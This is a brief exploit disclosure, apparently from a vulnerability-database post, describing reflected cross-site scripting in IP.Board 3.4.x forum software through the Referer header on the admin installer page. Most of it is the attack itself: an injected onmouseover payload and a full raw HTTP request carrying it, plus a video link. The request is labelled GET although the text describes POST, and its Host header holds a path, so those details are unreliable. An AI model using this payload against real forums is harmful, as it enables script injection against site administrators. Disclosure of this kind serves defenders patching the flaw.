±-------------------------------------------------------------------
+
±-------------------------------------------------------------------
test on IP.Board 3.4.6 & IP.Board 3.4.4
maybe work under 3.4
IP.Board is the leading solution for creating an engaging discussion forum on the web.
The attack is going with above-mentioned conditions. It's needed to send
POST request to http://path_forum/admin/install/index.php
with setting of Referer header.
Referer: 1" onmouseover=prompt(947671) bad="
GET /admin/install/index.php HTTP/1.1
Referer: 1" onmouseover=prompt(11111111) bad="
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Cookie:
Host: localhost/admin/install/index.php
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: /
https://www.youtube.com/watch?v=WYm4C611eyU&feature=youtu.be
±-------------------------------------------------------------------
+